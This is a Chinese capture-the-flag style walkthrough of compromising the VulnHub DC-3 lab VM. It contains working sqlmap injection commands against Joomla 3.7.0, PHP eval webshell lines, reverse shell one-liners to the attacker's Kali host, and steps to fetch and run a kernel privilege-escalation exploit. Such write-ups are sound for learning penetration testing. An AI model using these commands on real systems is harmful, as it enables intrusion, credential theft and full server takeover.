渗透测试学习之靶机DC-3

1.下载靶机

本篇文章是DC靶机系列的第三篇,针对的是靶机DC-3,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。

DC-3的下载地址为DC: 3.2 ~ VulnHub。三个地址建议使用磁力下载,比较快。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。

需要说明的是DC-3相较前两个靶机,它只有一个flag,便是最后一个flag,没有多余的提示了。

在VMware加载成功之后显示如下界面:

渗透测试学习之靶机DC-3_第1张图片

默认状态我们是打不开该系统的,也不知道账号密码的,毕竟我们的目的就是在不知道账号密码的情况下拿到root权限,找到flag。注意,这里建议把DC-3靶机的网络链接模式改为NAT模式。本文使用的攻击机为kali(安装在VMware上,IP为:192.168.179.128)。

2.收集靶机信息

由于本文的攻击机和靶机在同一个网络下,因此在kali上输入命令: arp-scan -l,显示如下

渗透测试学习之靶机DC-3_第2张图片

可判断出靶机的ip为192.168.179.131.接着使用nmap对该ip进行扫描,输入命令:nmap -sV -p- 192.168.179.131

渗透测试学习之靶机DC-3_第3张图片

看来只有一个开放端口80,我们访问http://192.168.179.131:80,看看有什么发现

渗透测试学习之靶机DC-3_第4张图片

随便点点,没什么发现。有个登陆窗口,此外我们看看网站指纹

渗透测试学习之靶机DC-3_第5张图片

发现该网站的CMS使用的是joomla,这个框架很成熟,是php非常常见的CMS框架,看到这儿,第一想法是看一下它的版本号,然后搜索一下是否存在漏洞,而且kali上还存在一个专门针对它的漏洞扫描工具Joomscan。我们抱着试试的心态扫一下,看看有什么发现。

3.漏洞扫描

输入命令行:joomscan --url http://192.168.179.131

渗透测试学习之靶机DC-3_第6张图片

有两个收获,第一,joomla的版本号是3.7.0,第二,存在一个后台管理页面http://192.168.179.131/administrator/。我们先访问一下,果然是后台管理页面。

渗透测试学习之靶机DC-3_第7张图片

其中这里要说明的时候,很多时候找到一个隐藏的页面没那么容易,拿到上一个登陆页面的时候,我还使用上一篇介绍的网站目录工具爆破了,没有发现什么有效的网页,所以同学们不要着急,渗透本身就是不断尝试、大海捞针的过程。

这个时候已经有两个登陆页面了,显然我们应该把重心放在第二个后台管理页面的账号密码上。而且此时盲目去爆破是下下策(即使我们勇敢的猜测账号很可能是admin),所以我们此时手里只剩一个线索了,就是joomla3.7.0。

接下来我们看看joomla这个版本有什么漏洞信息,有两个办法,一个是搜索引擎搜索;另一个是使用漏洞利用工具搜索,比如searchsploit 。使用百度搜索,果然发现了存在SQL注入漏洞。这个时候参照这些博客测试,我试了,写的都很详细。

渗透测试学习之靶机DC-3_第8张图片

这里主要介绍searchsploit,毕竟学习嘛。输入命令行:searchsploit joomla 3.7.0

可以看到第一个也是SQL注入,我们以它作为突破口(感兴趣的同学可以试试第二个,我失败了),接着查看详细的信息

渗透测试学习之靶机DC-3_第9张图片

接下来,我们把这个文件下载到本地,由上图可以看到该文件详细路径

输入命令行: cp /usr/share/exploitdb/exploits/php/webapps/42033.txt joomla1.txt 将其保存为joomla1.txt

打开查看

渗透测试学习之靶机DC-3_第10张图片

txt文件提示了使用sqlmap,并且将语句已经生成给我们了,试过搜索漏洞的同学可以看出,和网络搜索的结果是一样的,殊途同归。

4.漏洞利用

接下来我们打开sqlmap,开始注入漏洞,输入

sqlmap -u "http://192.168.179.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

渗透测试学习之靶机DC-3_第11张图片

破解出存在5个数据库,我们选择可能性最大的joomladb,继续爆破数据表,命令行为

sqlmap -u "http://192.168.179.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D  joomladb --tables  -p list[fullordering]

渗透测试学习之靶机DC-3_第12张图片

发现了76个表,用户名和密码很可能存在#__users 这个表里,继续爆破它的字段,这里存在一个习惯,我不喜欢给数据库、表格、字段等字样加上引号,而这个表是带符号的,不加引号可能会有问题。

​
sqlmap -u "http://192.168.179.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D  joomladb -T "#__users"  --columns  -p list[fullordering]

渗透测试学习之靶机DC-3_第13张图片

继续爆破字段,这里选择的是name,username,password三个字段

sqlmap -u "http://192.168.179.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D  joomladb -T "#__users"  -C  name,username,password --dump  -p list[fullordering]

渗透测试学习之靶机DC-3_第14张图片

这里得到了用户名为admin,而密码为hash后的值,在网上没找到很明显的joomla的hash文件,因此我们准备暴力解码,使用john工具

将password hash值保存成文本文件hash.txt,接着输入 John hash.txt

解密出来是snoopy,登陆成功

渗透测试学习之靶机DC-3_第15张图片

突发奇想,将这个账号密码登陆前端看看

渗透测试学习之靶机DC-3_第16张图片

成功,但是屁用没有,那么把精力放在后台管理页面上。没有什么好方法,只能仔细翻看,最后发现templates下存在模板,而模板里的php文件可编辑。

渗透测试学习之靶机DC-3_第17张图片

5.上传webshell

接下来要上传webshell,有好几种方式,感兴趣的朋友可以网络上搜索一下,很多

随便打开一个模板,随便打开一个php文件,放入我们的小马,当然放一个就好,我放的多是怕连不上。

@eval($_REQUEST['joomla']);
@eval($_POST['joomla']);

渗透测试学习之靶机DC-3_第18张图片

然后打开中国蚁剑(在kali上安装中国蚁剑需要几步操作,网上教程不是很全,读者可以看我的这篇博客VMware之kali安装中国蚁剑_xdbzdgx的博客-CSDN博客 )

然后填写信息

渗透测试学习之靶机DC-3_第19张图片

添加成功,此时是可以浏览网站目录和打开虚拟终端的。我们在/templates/beez3模板里上传一个反弹shell的文件,记住上传路径,文件由自己创建,本文的文件名为shell1.php

反弹shell内容为

& /dev/tcp/192.168.179.128/4444 0>&1' ");
?>
或者
&1|nc 192.168.1 4444 >/tmp/f');?>

然后kaili机器上开启nc -lvvp 4444监听

使用浏览器访问该文件,http://192.168.179.131/templates/beez3/shell1.php

渗透测试学习之靶机DC-3_第20张图片

这个时候脑子突然一抽,当时我在填写小马的时候,直接随便找一个模板中的php文件,写入上面的反弹shell,不就行了嘛!!

6.提权

反弹shell成功,现在已经拿到了权限更大的shell,但是显然还不够大,接下来开始提权root。我们在shell上输入uname -a 查看系统信息。

或者 cat /proc/version

cat /etc/issue

渗透测试学习之靶机DC-3_第21张图片

可知当前ubuntu的版本信息,我们接着看看该版本存在什么漏洞

渗透测试学习之靶机DC-3_第22张图片

对比搜索引擎搜索该版本漏洞,锁定path为39773.txt的漏洞。查看该文件路径

将其下载到本地,保存为39772.txt,然后打开查看

渗透测试学习之靶机DC-3_第23张图片

文件很长,其中看到这里,这里告诉我们破解的工具都保存在exploit.rar里了,并且给了下载链接,我们将其下载(在刚刚反弹过来的shell里)

wget  上面截图的url

但是很容易因网络问题,下载失败,或者随后的解压失败,此时可使用国内的路径下载,国内的路径为

https://gitee.com/aaaddc/exploitdb-bin-sploits/blob/master/bin-sploits/39772.zip

然后解压 unzip 39772.zip

渗透测试学习之靶机DC-3_第24张图片

紧接着

渗透测试学习之靶机DC-3_第25张图片

解开了exploit.tar文件可以看到有很多的脚本,接着进行如下操作。

./compile.sh
ls
cd ebpf_mapfd_doubleput_exploit
ls

渗透测试学习之靶机DC-3_第26张图片

./compile.sh

渗透测试学习之靶机DC-3_第27张图片

编译成功,接着提权

./doubleput

等一会显示成功,此时是root权限,打开root目录,发现the-flag.txt.成功!

渗透测试学习之靶机DC-3_第28张图片

你可能感兴趣的:(安全,安全,web安全,网络,渗透测试,靶机)